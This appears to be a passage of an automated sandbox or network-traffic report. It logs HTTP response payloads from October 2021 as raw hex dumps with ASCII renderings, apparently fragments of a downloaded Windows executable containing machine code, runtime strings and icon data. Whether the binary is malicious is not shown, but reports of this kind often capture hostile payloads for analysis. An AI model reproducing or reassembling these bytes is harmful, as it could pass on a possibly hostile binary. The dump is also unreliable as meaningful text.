                                  2021-10-21 17:40:39 UTC70INData Raw: 8b ec 49 48 24 e4 40 48 74 5b 00 70 49 5c ff b7 48 8d 41 00 49 ff f0 00 50 8d c4 00 8b cc 05 48 00 15 01 eb 00 e9 24 8e ff 71 ff e9 15 48 b1 d9 24 44 00 48 8b 45 8b 3e 09 24 5c 8b ff ff ff 48 ec 48 cc 8b 8b 44 24 11 24 2a 18 48 19 d0 18 26 24 e9 48 48 24 48 ff 1a ff 48 24 0f 86 15 c4 55 83 51 1b 8b 8c 48 98 78 00 15 00 d7 80 3b 15 50 5d 00 0f eb 44 00 60 c7 00 ff bf cc 05 00 48 c6 f1 58 48 00 4c 37 8b db 48 c3 8d 24 48 6d c9 7f 0d 4c 15 e8 c3 49 97 8b 00 cc 54 00 48 8b 24 30 00 24 8b 18 8b 00 6c 3e 89 8b 30 48 ff 27 24 89 48 e8 0e ff 48 bb 28 8b 8d 48 48 24 ff e0 51 89 8d cf 0f 8b 8b 15 48 c3 8d 48 53 48 33 4f da 00 83 c7 48 8d 00 8d 1a 10 8b ff 8b ff 0a 15 00 e5 c3 48 63 1a 48 58 00 45 ec f0 63 89 4c ff 5b 30 21 14 00 0a 00 24 48 09 48 8b 94 48 48 f0 5c
                                  Data Ascii: IH$@Ht[pI\HAIPH$qH$DHE>$\HHD$$*H&$HH$HH$UQHx;P]D`HXHL7H$HmLITH$0$l>0H'$HH(HH$QHHSH3OHHcHXEcL[0!$HHHH\
                                  2021-10-21 17:40:39 UTC78INData Raw: 74 24 4b 89 24 0f eb 24 c4 eb 89 94 00 08 c6 5c 2c c7 00 ff 48 4d 48 cc c0 3d d0 02 8b 8b e8 8d 48 8d 4d 1b 44 00 40 ff 24 8d 01 00 c0 24 0f 89 00 4e 8b 00 45 57 2f 48 60 48 49 83 00 c0 90 15 f1 0a 08 49 00 8c ab f6 48 cc 40 15 ff 4c 01 48 70 48 00 00 48 53 33 ff 70 ce 15 45 8d d0 74 89 48 8b 48 ff 0f 83 4b 8b 8f cc 8b 48 8b 83 e4 48 24 ff 15 75 ff 89 00 fe 8d 48 4c 3b 05 ec 00 89 8d 53 c7 c0 83 c0 48 15 48 49 ff 00 8b 00 43 49 3b d0 00 8b 48 48 c7 48 5c 00 56 80 8d 83 00 48 48 8b 45 83 48 9b 74 27 5e c9 15 4d 0b 70 49 cc c8 15 ff 01 48 85 15 74 8d 83 8d 8d ff 48 c3 5e 48 48 48 00 8b 48 8d d7 8b 8d 8d 00 00 af ff 4c 4b ff 00 08 60 00 48 d2 40 ff ff 8d 48 00 8b 70 24 c7 00 00 b0 0c 48 48 c8 c0 44 8b 5c 00 89 c3 48 f0 bb e8 8b 8d 48 8b c9 d0 d0 15 8b e8 58
                                  Data Ascii: t$K$$\,HMH=HMD@$$NEW/H`HIIH@LHpHHS3pEtHHKHH$uHL;SHHICI;HHH\VHHEHt'^MpIHtH^HHHHLK`H@Hp$HHD\HHX
                                  2021-10-21 17:40:39 UTC86INData Raw: e3 98 8b 41 cc 01 fa 00 d4 48 15 ec cc 24 83 a6 ff e0 24 40 24 48 c3 08 18 48 33 00 cc 07 01 01 17 09 ff 13 cc 38 33 00 ff 8d 58 de 8d 48 bf 15 29 85 85 ff 00 44 ff 21 3c 00 c7 45 c9 48 48 00 00 fe 00 90 cc 48 ff 40 4b f6 cc ff 8d ff cc 66 4b 8b 90 5d 8b 0f 18 00 29 00 cc 24 cc 48 06 e8 48 cc 3d 48 8b b3 15 ff 56 4b 48 ff 5c 74 cc 07 d6 2e 24 48 94 90 cc 15 48 27 00 01 ff eb 00 ff 89 cc 15 fe d7 c7 cc 60 cc 05 a4 1d 4c fe 75 cc 5c 10 0a 4c 48 85 48 f0 8b 24 48 20 44 74 00 24 20 e8 48 43 30 21 c7 83 48 8b 48 9f f8 68 15 cc 9c 00 85 48 00 00 f8 d8 89 00 24 24 05 05 37 ce 48 31 ff 48 0c 48 56 8b 0a 24 8b 40 53 92 c0 db 74 48 2b 75 24 47 83 cc 74 93 24 45 24 8d 2d 48 ff cc 00 ff 48 4b 48 48 10 ff 4c cc ff 8b c9 c7 e8 8b 4d 4c 00 c8 fd 4c c2 cc 00 49 00 f2 23
                                  Data Ascii: AH$$@$HH383XH)D!<EHHH@KfK])$HH=HVKH\t.$HH'`Lu\LHH$H Dt$ HC0!HHhH$$7H1HHV$@StH+u$Gt$E$-HHKHHLMLLI#
                                  2021-10-21 17:40:39 UTC94INData Raw: 4f 15 cc 48 15 1b 8d ff 98 85 90 ff 22 48 24 89 57 48 d0 9a 8b cc 15 8d cc 00 4c 00 cc 00 c2 8b 2f 89 53 eb c4 47 8d ff 44 00 8d 47 d6 5b 05 24 cc 00 03 48 0b 24 b6 48 20 00 48 b6 0c 24 48 fa 44 00 48 40 8b 18 49 15 07 cc cc 8b 48 cc 21 48 48 48 48 4c 8b 24 00 8b 80 f0 f4 00 30 30 8d 57 cc ff 48 58 20 8d 48 48 8b 74 68 00 c7 ff 20 8d 5b 30 ab c0 c7 00 bc 00 7d 83 8b 48 18 c6 3b 28 24 43 90 00 00 ff 28 2f 8d 87 cb 8b 48 cc 08 98 8b 74 00 5c ba cc 8d f1 48 59 8d ff 47 d4 24 4c 24 c6 4b 10 24 8b 4d 41 84 00 04 8b 49 8b 8d f7 f6 48 30 13 ff 13 48 00 c7 41 8b 8d 00 cc 83 5b 48 43 52 44 5c 8b 8d 0f cf 2d c7 f9 04 07 03 ba cc 44 00 ce 10 40 05 20 11 48 a8 ff 59 48 85 30 48 ff 48 48 c9 00 8b 12 60 c2 00 c6 8b ff 89 cc e3 80 4c 8d 24 cc 00 10 fe 00 ff 00 00 86 4c
                                  Data Ascii: OH"H$WHL/SGDG[$H$H H$HDH@IH!HHHHL$00WHX HHth [0}H;($C(/Ht\HYG$L$K$MAIH0HA[HCRD\-D@ HYH0HHH`L$L
                                  2021-10-21 17:40:39 UTC102INData Raw: 48 d9 c3 fc c7 18 24 20 40 cd 24 cc 00 8d 42 b8 00 48 e4 38 ff 74 48 38 48 74 53 01 e7 24 89 8b 43 40 c6 8d c5 4f cc 24 08 cc 8d f8 cc 38 ff ff 48 05 c4 48 08 08 24 00 8b 88 ff cc cc ea ff 53 c4 44 15 ff 83 7d 1f 00 d8 83 f0 74 1d 8b cc 83 f9 76 17 ff c1 30 7f 00 44 c3 00 8d 00 24 24 24 48 da 20 45 e8 e2 48 b7 f6 81 7e 03 48 24 83 01 48 74 49 24 76 5c 00 8b 41 09 2a f8 8b 01 00 c7 08 48 28 48 3e 54 13 0b ff 83 33 ff 44 8b 75 ff 8b f8 12 24 00 aa cb c8 10 89 00 74 89 48 4c 15 47 00 19 00 d9 8b 20 30 8b 95 44 18 20 8b 10 2f 48 24 89 89 f8 81 00 ff 48 48 89 48 80 8b 48 e6 0f cb 48 38 8b ff 14 48 4d 8b 48 8b c0 da 00 48 68 e8 47 24 53 89 48 00 48 c9 cb 45 8d 7f cc ff fb 3b cc e8 00 35 11 00 89 90 10 0f 48 23 15 48 57 5e 10 47 48 48 7c 15 48 24 85 cc 8d cc 44
                                  Data Ascii: H$ @$BH8tH8HtS$C@O$8HH$SD}tv0D$$$H EH~H$HtI$v\A*H(H>T3Du$tHLG 0D /H$HHHHH8HMHHhG$SHHE;5H#HW^GHH|H$D
                                  2021-10-21 17:40:39 UTC109INData Raw: c7 8b 9a 8b 48 8d 8b 48 17 8b 75 4d 08 00 db 7b cf d2 48 09 15 17 f4 1d 05 8b 77 31 8d ff 8b 15 8b 89 56 48 00 00 00 89 8d 8b 00 00 ff 8b d0 4e 79 01 c0 41 49 48 c3 7b eb c7 49 00 8b 09 8b c3 8b 83 c7 4c 07 05 24 05 85 0e 00 8b ff cc c7 74 d9 ff 8b fd 82 45 20 83 07 20 ff 00 08 15 c7 4c f1 49 61 8b 05 07 d0 d4 95 00 00 8d ec 48 03 85 00 e8 48 c4 85 8d 5c fa 28 48 c8 8b ff 8d 93 8b 10 3d 27 ff 89 c1 58 44 7c 14 35 4d ea 78 8b 8b 00 00 fc 0f 4c 4c 00 f4 ff f0 48 00 b6 48 24 96 7f 78 43 8b 58 8b 49 7c 9c c3 24 cc 48 1f 55 89 f3 89 30 cc 15 00 48 cc bb 40 f5 6d 1c c3 24 ee ff 63 25 48 48 05 d9 5b 4c e0 ce c7 3b 4c 00 48 78 ea 4d 00 05 ff 02 5c 74 75 00 b1 48 00 cb ba 48 2b 24 3b fe 24 c0 15 c0 57 8d 83 45 07 4c 74 15 89 cc c7 48 2a 00 00 4c 00 83 2b 15 fd 8b
                                  Data Ascii: HHuM{Hw1VHNyAIH{IL$tE LIaHH\(H='XD|5MxLLHH$xCXI|$HU0H@m$c%HH[L;LHxM\tuHH+$;$WELtH*L+
                                  2021-10-21 17:40:39 UTC117INData Raw: cc 0e c7 15 2f 44 00 fe 00 30 8b 0d 4c c3 08 00 00 21 11 c7 bf 19 f7 00 8b cc c7 00 66 8b 10 89 e9 89 00 00 a5 e8 63 b1 0f 0f 48 9a 4d 4d 02 cc 41 a8 8d e0 8b 50 c8 00 b0 83 ff 08 d0 b2 b3 cb 8d 00 15 cc 00 ff 24 15 15 8b 8d 00 e8 0e 54 48 83 cf 45 44 e0 30 d0 41 76 c3 45 ba 05 ce 00 05 c0 15 cc 00 cc cc 48 c0 c3 50 53 cc 1c 0b cc 00 eb d2 5c 48 00 48 97 4c 48 e1 ca 48 89 00 ff 60 74 ff 24 20 10 d4 00 56 8b 7d d8 24 20 0b 48 48 10 8b 18 48 cc d1 4d ea 15 48 48 83 cc 20 83 3a cc cc 15 8d 48 48 74 49 48 ff 2f 53 48 00 75 24 89 ff 8d 8d 08 09 48 8d 00 00 18 0c 4d 03 c0 24 89 20 24 49 cc 15 3e 83 48 48 be 7f bf 48 49 5d 60 48 c0 6d 00 f6 8d 8b 48 fe 00 15 20 8d 35 10 15 c1 48 cc c9 00 ff 7e 24 8d 20 48 4f 48 8b 8d 4c c7 48 13 74 8b 85 cc f8 f7 15 00 48 8d 01
                                  Data Ascii: /D0L!fcHMMAP$THED0AvEHPS\HHLHH`t$ V}$ HHHMHH :HHtIH/SHu$HM$ $I>HHHI]`HmH 5H~$ HOHLHtH
                                  2021-10-21 17:40:39 UTC125INData Raw: d3 30 ff 90 8b 20 8b cc e2 01 33 e8 1c 8b 48 20 f7 6d 48 01 8b 00 33 00 ec 4c e8 48 a6 4c 83 70 89 44 00 ff d2 c7 00 60 8b 5c 84 8d ff 00 3b 8d 50 e8 15 89 8b 19 48 00 8b 48 38 00 30 8b 83 10 63 8b 75 8b 0f 30 cc cc 40 eb a8 f8 ff 10 ff 48 2f 31 14 85 0e c0 8b 19 c7 4f 48 00 24 00 4c f7 e8 04 00 8b 60 60 8b d0 00 08 01 56 15 11 66 01 f0 50 09 60 4c 4c 24 24 89 f3 ff 24 00 48 48 48 24 eb cb 40 11 d6 48 ff ff 28 5f 0f ce 60 22 d2 da 00 08 8b 00 1d 79 f6 c0 0f 8b 16 8b ec 24 99 83 40 cc 02 48 8b 74 c2 48 4d 48 cb 8d 15 8b 5c ff 7c 8d 00 cf 4c 8b 5b 04 24 48 ff ba 1b 0f ff 01 0b 89 c3 cc 03 74 2b 15 f8 cc cb 48 15 04 ff 40 24 ff f8 00 e8 74 83 b8 74 5f c3 8b 33 d1 24 1c e8 19 48 af 8b 22 00 90 20 89 85 90 48 60 00 44 83 c1 15 8b 33 08 24 48 10 74 6c 00 b5 30
                                  Data Ascii: 0 3H mH3LHLpD`\;PHH80cu0@H/1OH$L``VfP`LL$$$HHH$@H(_`"y$@HtHMH\|L[$Ht+H@$tt_3$H" H`D3$Htl0
                                  2021-10-21 17:40:39 UTC133INData Raw: 83 c0 55 0f b7 c0 99 2b f0 8b 44 24 24 1b c2 03 de ba 00 00 00 00 13 d0 0f b7 44 24 10 80 c1 19 0f af f8 02 c9 89 54 24 18 02 4c 24 10 02 cb 89 3d 88 67 05 10 0f b6 c1 99 3b 54 24 18 72 27 77 04 3b c3 72 21 0f af 3d c4 67 05 10 8a c1 04 32 02 c9 02 c1 02 c3 0f b6 c0 89 3d 88 67 05 10 5f 5e 5b 8b e5 5d c3 5f 5e 0f b6 c1 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 51 8b 15 78 67 05 10 b8 48 68 05 10 53 57 8b d9 8b 0d c4 67 05 10 56 66 0f 1f 84 00 00 00 00 00 8b 35 88 67 05 10 3b ce 74 1f 29 18 8d 14 55 29 e7 fe ff 83 e8 08 89 15 78 67 05 10 3d 80 67 05 10 7f dd 8b 35 88 67 05 10 8a 0d 76 67 05 10 0f b6 c1 3b d0 72 29 8a c2 0f af f3 2a c3 02 c8 0f b6 c1 03 c3 88 0d 76 67 05 10 81 c2 99 73 ff ff 89 35 88 67 05 10 8d 14 50 89 15 78 67 05 10 8b
                                  Data Ascii: U+D$$D$T$L$=g;T$r'w;r!=g2=g_^[]_^[]QxgHhSWgVf5g;t)U)xg=g5gvg;r)*vgs5gPxg
                                  2021-10-21 17:40:39 UTC141INData Raw: ec 56 ff 75 08 8b f1 e8 25 00 00 00 c7 06 9c e2 02 10 8b c6 5e 5d c2 04 00 83 61 04 00 8b c1 83 61 08 00 c7 41 04 a4 e2 02 10 c7 01 9c e2 02 10 c3 55 8b ec 56 8b f1 8d 46 04 c7 06 60 e2 02 10 83 20 00 83 60 04 00 50 8b 45 08 83 c0 04 50 e8 6b 0b 00 00 59 59 8b c6 5e 5d c2 04 00 8d 41 04 c7 01 60 e2 02 10 50 e8 b6 0b 00 00 59 c3 55 8b ec 56 8b f1 8d 46 04 c7 06 60 e2 02 10 50 e8 9f 0b 00 00 f6 45 08 01 59 74 0a 6a 0c 56 e8 f7 01 00 00 59 59 8b c6 5e 5d c2 04 00 55 8b ec 83 ec 0c 8d 4d f4 e8 3d ff ff ff 68 3c 4d 05 10 8d 45 f4 50 e8 8a 0b 00 00 cc 55 8b ec 83 ec 0c 8d 4d f4 e8 53 ff ff ff 68 90 4d 05 10 8d 45 f4 50 e8 6d 0b 00 00 cc 8b 41 04 85 c0 75 05 b8 68 e2 02 10 c3 55 8b ec 83 25 d8 6b 05 10 00 83 ec 24 53 33 db 43 09 1d 10 60 05 10 6a 0a e8 d7 8e 00
                                  Data Ascii: Vu%^]aaAUVF` `PEPkYY^]A`PYUVF`PEYtjVYY^]UM=h<MEPUMShMEPmAuhU%k$S3C`j
                                  2021-10-21 17:40:39 UTC148INData Raw: 00 ff 15 28 e1 02 10 8b c8 85 c9 75 03 32 c0 c3 b8 4d 5a 00 00 66 39 01 75 f3 8b 41 3c 03 c1 81 38 50 45 00 00 75 e6 b9 0b 01 00 00 66 39 48 18 75 db 83 78 74 0e 76 d5 83 b8 e8 00 00 00 00 0f 95 c0 c3 8b ff 55 8b ec 51 51 a1 04 60 05 10 33 c5 89 45 fc 83 65 f8 00 8d 45 f8 50 68 4c ec 02 10 6a 00 ff 15 6c e1 02 10 85 c0 74 23 56 68 64 ec 02 10 ff 75 f8 ff 15 60 e1 02 10 8b f0 85 f6 74 0d ff 75 08 8b ce ff 15 10 e2 02 10 ff d6 5e 83 7d f8 00 74 09 ff 75 f8 ff 15 5c e1 02 10 8b 4d fc 33 cd e8 7b d5 ff ff 8b e5 5d c3 8b ff 55 8b ec 8b 45 08 a3 90 6c 05 10 5d c3 6a 01 6a 00 6a 00 e8 de fd ff ff 83 c4 0c c3 8b ff 55 8b ec 6a 00 6a 02 ff 75 08 e8 c9 fd ff ff 83 c4 0c 5d c3 a1 8c 6c 05 10 c3 8b ff 55 8b ec 83 ec 0c 83 7d 08 02 56 74 1c 83 7d 08 01 74 16 e8 3b 17
                                  Data Ascii: (u2MZf9uA<8PEuf9HuxtvUQQ`3EeEPhLjlt#Vhdu`tu^}tu\M3{]UEl]jjjUjju]lU}Vt}t;
                                  2021-10-21 17:40:39 UTC156INData Raw: 00 00 00 ff 15 ec e0 02 10 eb 15 83 f8 fc 75 10 8b 45 f4 c7 05 f8 6f 05 10 01 00 00 00 8b 40 08 80 7d fc 00 74 0a 8b 4d f0 83 a1 50 03 00 00 fd 8b e5 5d c3 8b ff 55 8b ec 53 8b 5d 08 56 57 68 01 01 00 00 33 ff 8d 73 18 57 56 e8 6f c9 ff ff 89 7b 04 33 c0 89 7b 08 83 c4 0c 89 bb 1c 02 00 00 b9 01 01 00 00 8d 7b 0c ab ab ab bf 50 63 05 10 2b fb 8a 04 37 88 06 46 83 e9 01 75 f5 8d 8b 19 01 00 00 ba 00 01 00 00 8a 04 39 88 01 41 83 ea 01 75 f5 5f 5e 5b 5d c3 8b ff 55 8b ec 81 ec 20 07 00 00 a1 04 60 05 10 33 c5 89 45 fc 53 56 8b 75 08 8d 85 e8 f8 ff ff 57 50 ff 76 04 ff 15 e4 e0 02 10 33 db bf 00 01 00 00 85 c0 0f 84 f0 00 00 00 8b c3 88 84 05 fc fe ff ff 40 3b c7 72 f4 8a 85 ee f8 ff ff 8d 8d ee f8 ff ff c6 85 fc fe ff ff 20 eb 1f 0f b6 51 01 0f b6 c0 eb 0d
                                  Data Ascii: uEo@}tMP]US]VWh3sWVo{3{{Pc+7Fu9Au_^[]U `3ESVuWPv3@;r Q
                                  2021-10-21 17:40:39 UTC164INData Raw: 8d 14 36 8d 4a 08 3b d1 1b c0 85 c1 74 4a 8d 4a 08 3b d1 1b c0 23 c1 8d 4a 08 3d 00 04 00 00 77 19 3b d1 1b c0 23 c1 e8 83 35 00 00 8b fc 85 ff 74 64 c7 07 cc cc 00 00 eb 19 3b d1 1b c0 23 c1 50 e8 19 cd ff ff 8b f8 59 85 ff 74 49 c7 07 dd dd 00 00 83 c7 08 eb 02 33 ff 85 ff 74 38 6a 00 6a 00 6a 00 56 57 ff 75 f8 53 ff 75 10 ff 75 0c e8 fa d4 ff ff 85 c0 74 1d 33 c0 50 50 39 45 20 75 3a 50 50 56 57 50 ff 75 24 ff 15 78 e1 02 10 8b f0 85 f6 75 2e 57 e8 f4 fd ff ff 59 33 f6 53 e8 eb fd ff ff 59 8b c6 8d 65 ec 5f 5e 5b 8b 4d fc 33 cd e8 ec 96 ff ff 8b e5 5d c3 ff 75 20 ff 75 1c eb c0 57 e8 c6 fd ff ff 59 eb d2 8b ff 55 8b ec 83 ec 10 ff 75 08 8d 4d f0 e8 56 ca ff ff ff 75 28 8d 45 f4 ff 75 24 ff 75 20 ff 75 1c ff 75 18 ff 75 14 ff 75 10 ff 75 0c 50 e8 af fd
                                  Data Ascii: 6J;tJJ;#J=w;#5td;#PYtI3t8jjjVWuSuut3PP9E u:PPVWPu$xu.WY3SYe_^[M3]u uWYUuMVu(Eu$u uuuuuP
                                  2021-10-21 17:40:39 UTC172INData Raw: 00 00 00 c3 8b 42 04 25 00 00 f0 7f 3d 00 00 f0 7f 74 03 dd 02 c3 8b 42 04 83 ec 0a 0d 00 00 ff 7f 89 44 24 06 8b 42 04 8b 0a 0f a4 c8 0b c1 e1 0b 89 44 24 04 89 0c 24 db 2c 24 83 c4 0a a9 00 00 00 00 8b 42 04 c3 8b 44 24 08 25 00 00 f0 7f 3d 00 00 f0 7f 74 01 c3 8b 44 24 08 c3 66 81 3c 24 7f 02 74 03 d9 2c 24 5a c3 66 8b 04 24 66 3d 7f 02 74 1e 66 83 e0 20 74 15 9b df e0 66 83 e0 20 74 0c b8 08 00 00 00 e8 d9 00 00 00 5a c3 d9 2c 24 5a c3 83 ec 08 dd 14 24 8b 44 24 04 83 c4 08 25 00 00 f0 7f eb 14 83 ec 08 dd 14 24 8b 44 24 04 83 c4 08 25 00 00 f0 7f 74 3d 3d 00 00 f0 7f 74 5f 66 8b 04 24 66 3d 7f 02 74 2a 66 83 e0 20 75 21 9b df e0 66 83 e0 20 74 18 b8 08 00 00 00 83 fa 1d 74 07 e8 7b 00 00 00 5a c3 e8 5d 00 00 00 5a c3 d9 2c 24 5a c3 dd 05 0c 22 03 10
                                  Data Ascii: B%=tBD$BD$$,$BD$%=tD$f<$t,$Zf$f=tf tf tZ,$Z$D$%$D$%t==t_f$f=t*f u!f tt{Z]Z,$Z"
                                  2021-10-21 17:40:39 UTC180INData Raw: ea 02 10 14 ea 02 10 30 ea 02 10 44 ea 02 10 64 ea 02 10 5f 5f 62 61 73 65 64 28 00 00 00 00 5f 5f 63 64 65 63 6c 00 5f 5f 70 61 73 63 61 6c 00 00 00 00 5f 5f 73 74 64 63 61 6c 6c 00 00 00 5f 5f 74 68 69 73 63 61 6c 6c 00 00 5f 5f 66 61 73 74 63 61 6c 6c 00 00 5f 5f 76 65 63 74 6f 72 63 61 6c 6c 00 00 00 00 5f 5f 63 6c 72 63 61 6c 6c 00 00 00 5f 5f 65 61 62 69 00 00 5f 5f 73 77 69 66 74 5f 31 00 00 00 5f 5f 73 77 69 66 74 5f 32 00 00 00 5f 5f 70 74 72 36 34 00 5f 5f 72 65 73 74 72 69 63 74 00 00 5f 5f 75 6e 61 6c 69 67 6e 65 64 00 72 65 73 74 72 69 63 74 28 00 00 00 20 6e 65 77 00 00 00 00 20 64 65 6c 65 74 65 00 3d 00 00 00 3e 3e 00 00 3c 3c 00 00 21 00 00 00 3d 3d 00 00 21 3d 00 00 5b 5d 00 00 6f 70 65 72 61 74 6f 72 00 00 00 00 2d 3e 00 00 2a 00 00 00
                                  Data Ascii: 0Dd__based(__cdecl__pascal__stdcall__thiscall__fastcall__vectorcall__clrcall__eabi__swift_1__swift_2__ptr64__restrict__unalignedrestrict( new delete=>><<!==!=[]operator->*
                                  2021-10-21 17:40:39 UTC188INData Raw: 04 00 00 d4 0b 03 10 5a 04 00 00 e4 0b 03 10 65 04 00 00 f4 0b 03 10 6b 04 00 00 04 0c 03 10 6c 04 00 00 14 0c 03 10 81 04 00 00 20 0c 03 10 01 08 00 00 2c 0c 03 10 04 08 00 00 7c f4 02 10 07 08 00 00 38 0c 03 10 09 08 00 00 44 0c 03 10 0a 08 00 00 50 0c 03 10 0c 08 00 00 5c 0c 03 10 10 08 00 00 68 0c 03 10 13 08 00 00 74 0c 03 10 14 08 00 00 80 0c 03 10 16 08 00 00 8c 0c 03 10 1a 08 00 00 98 0c 03 10 1d 08 00 00 b0 0c 03 10 2c 08 00 00 bc 0c 03 10 3b 08 00 00 d4 0c 03 10 3e 08 00 00 e0 0c 03 10 43 08 00 00 ec 0c 03 10 6b 08 00 00 04 0d 03 10 01 0c 00 00 14 0d 03 10 04 0c 00 00 20 0d 03 10 07 0c 00 00 2c 0d 03 10 09 0c 00 00 38 0d 03 10 0a 0c 00 00 44 0d 03 10 0c 0c 00 00 50 0d 03 10 1a 0c 00 00 5c 0d 03 10 3b 0c 00 00 74 0d 03 10 6b 0c 00 00 80 0d 03 10
                                  Data Ascii: Zekl ,|8DP\ht,;>Ck ,8DP\;tk
                                  2021-10-21 17:40:39 UTC195INData Raw: c0 ef 59 1e 17 a7 3f db 54 cf 3f 1a bd 16 3d 00 00 c7 02 90 3e aa 3f 86 d3 d0 c8 57 d2 21 3d 00 40 c3 2d 33 32 ad 3f 1f 44 d9 f8 db 7a 1b 3d 00 a0 d6 70 11 28 b0 3f 76 50 af 28 8b f3 1b 3d 00 60 f1 ec 1f 9c b1 3f d4 55 53 1e 3f e0 3e 3d 00 c0 65 fd 1b 15 b3 3f 95 67 8c 04 80 e2 37 3d 00 60 c5 80 27 93 b4 3f f3 a5 62 cd ac c4 2f 3d 00 80 e9 5e 73 05 b6 3f 9f 7d a1 23 cf c3 17 3d 00 a0 4a 8d 77 6b b7 3f 7a 6e a0 12 e8 03 1c 3d 00 c0 e4 4e 0b d6 b8 3f 82 4c 4e cc e5 00 39 3d 00 40 24 22 b4 33 ba 3f 35 57 67 34 70 f1 36 3d 00 80 a7 54 b6 95 bb 3f c7 4e 76 24 5e 0e 29 3d 00 e0 e9 02 26 ea bc 3f cb cb 2e 82 29 d1 eb 3c 00 a0 6c c1 b4 42 be 3f e9 4d 8d f3 0f e5 25 3d 00 60 6a b1 05 8d bf 3f a7 77 b7 a2 a5 8e 2a 3d 00 20 3c c5 9b 6d c0 3f 45 fa e1 ee 8d 81 32 3d
                                  Data Ascii: Y?T?=>?W!=@-32?Dz=p(?vP(=`?US?>=e?g7=`'?b/=^s?}#=Jwk?zn=N?LN9=@$"3?5Wg4p6=T?Nv$^)=&?.)<lB?M%=`j?w*= <m?E2=
                                  2021-10-21 17:40:39 UTC203INData Raw: ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 91 8e 4a ff 91 8e 4a fe 91 8e 4a fe 91 8e 4a ff 91 8e 4a fe 91 8e 4a fe 91 8e 4a ff 91 8e 4a fe 91 8e 4a fe 91 8e 4a ff 91 8e 4a fe 91 8e 4a ff 91 8e 4a fe 91 8e 4a fe 91 8e 4a fe 91 8e 4a ff 91 8e 4a fe 91 8e 4a fe 91 8e 4a ff 91 8e 4a fe 91 8e 4a fe 91 8e 4a ff 91 8e 4a fe 91 8e 4a fe 91 8e 4a ff 91 8e 4a fe 91 8e 4a fe 91 8e 4a ff 91 8e 4a fe 91 8e 4a fe 91 8e 4a ff 91 8e 4a fe 91 8e 4a ff 91 8e 4a fe 91 8e 4a fe 91 8e 4a ff 91 8e 4a fe 91 8e 4a fe 91 8e 4a ff 91 8e 4a fe 91 8e 4a fe 91 8e 4a ff 91 8e 4a fe 91 8e 4a fe 91 8e 4a ff 91 8d 4a fe 95 86 4a fe 6a 5f 34 ff 6a 5e 34 fe 95 85 49 fe 96 86 4a ff 95 85 49 fe 95 85 49 fe 96 86 4a ff 95 85 49 fe 95 85
                                  Data Ascii: JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJj_4j^4IJIIJI
                                  2021-10-21 17:40:39 UTC211INData Raw: ff b3 a7 7c ff b3 a7 7c ff b3 a7 7c ff b3 a7 7c ff b3 a7 7c ff b3 a7 7c ff b3 a7 7c ff b3 a7 7c ff b3 a7 7c ff b3 a7 7c ff b3 a7 7c ff a4 96 62 ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 6c d4 51 ff 6b d3 50 fe 6b d3 50 fe 6c d4 51 ff 6b d3 50 fe 6b d3 50 fe 6c d4 51 ff 6b d3 50 fe 6b d3 50 fe 6c d4 51 ff 6b d3 50 fe 6c d4 51 ff 6b d3 50 fe 6b d3 50 fe 6b d3 50 fe 6c d4 51 ff 6b d3 50 fe 6b d3 50 fe 6c d4 51 ff 6b d3 50 fe 6b d3 50 fe 6c d4 51 ff 6b d3 50 fe 6b d3 50 fe 6c d4 51 ff 6b d3 50 fe 6b d3 50 fe 6c d4 51 ff 6b d3 50 fe 6b d3 50 fe 6c d4 51 ff 6b d3 50 fe 6c d4 51 ff 6b d3 50 fe 6b d3 50 fe 6c d4 51 ff 95 85 49 fe 95 85 49 fe 96 86 4a ff 95 85
                                  Data Ascii: |||||||||||bJJJJJJJJJJJJlQkPkPlQkPkPlQkPkPlQkPlQkPkPkPlQkPkPlQkPkPlQkPkPlQkPkPlQkPkPlQkPlQkPkPlQIIJ
                                  2021-10-21 17:40:39 UTC219INData Raw: b4 5a e0 15 42 38 07 07 08 08 00 00 07 07 02 5d b6 3b 51 09 35 02 00 00 00 00 00 00 ff ff 01 01 00 00 ff ff c7 b3 b1 76 b0 2a a9 ff ff 07 07 00 00 00 76 b6 d8 4a 72 ef cf 4c cb 26 40 00 00 00 07 07 06 06 03 c7 84 fb 5b bd 54 36 20 a7 f7 a8 e4 2c 65 03 03 03 ff ff 00 00 07 07 00 00 f7 0e 4a 65 0e ff ff 00 00 00 00 00 00 00 00 ff ff fb f2 3b 3a 13 0c b7 65 9e 00 00 ff ff ff ff 08 08 72 e5 2c 70 25 08 08 0a 0a 00 96 3a b8 02 72 d4 39 00 ff ff ff ff 06 06 03 03 9b dd 59 d3 87 be a3 79 1f 00 00 00 00 0a 0a 03 03 00 00 07 07 00 00 ff b1 cc 57 13 05 19 ce be ff 00 00 03 03 00 00 ac 56 52 3e 4b 7a 36 5b da f9 36 4b ff ff 0a 0a 00 00 00 00 1c 6f f9 e2 2a f2 03 03 00 00 ff ff 00 00 00 00 06 a6 d5 78 e8 f4 a6 19 06 00 00 00 00 00 00 00 00 00 00 00 77 f9 59 56 28 98
                                  Data Ascii: ZB8];Q5v*vJrL&@[T6 ,eJe;:er,p%:r9YyWVR>Kz6[6Ko*xwYV(
                                  2021-10-21 17:40:39 UTC227INData Raw: 7b 73 23 33 0d 25 47 74 00 00 00 00 00 00 00 00 dd 54 0e 79 3b e6 64 ed 00 00 ff ff 07 a1 79 d0 c1 ad 7b ff 44 e4 d5 59 f5 07 ff ff ff ff 00 00 ff ff 46 8e 87 a9 27 a2 07 07 00 00 00 00 00 00 ff ff 00 00 00 00 0a 2c bc 42 f6 87 bb 70 0a 06 06 00 00 02 02 fd 86 55 ab b3 3e ec b8 ae be f6 ff ff fe fe 04 04 00 00 10 dd 22 39 28 c0 46 49 44 17 2e dc 6b ab ff ff 00 00 00 00 0a 0a 00 00 00 4f ac 55 ba 8c 00 0a 0a 03 03 00 00 ff ff 00 00 00 fb d6 da 2a a4 f7 fc 0f 53 00 ff ff 08 08 ff ff 00 9f 61 4a ea 1c 00 00 00 ff ff 9b 84 d7 ba 4d d8 82 00 00 ff ff 00 00 0b 0b 00 84 88 27 5e 9b 0f ef 1d dd 00 00 00 04 04 00 00 00 00 00 00 03 03 01 01 3b d5 ae 06 56 3d 36 ca 00 00 00 00 00 00 07 1d 8b b5 6d ec f2 3e 5e a0 5c fe 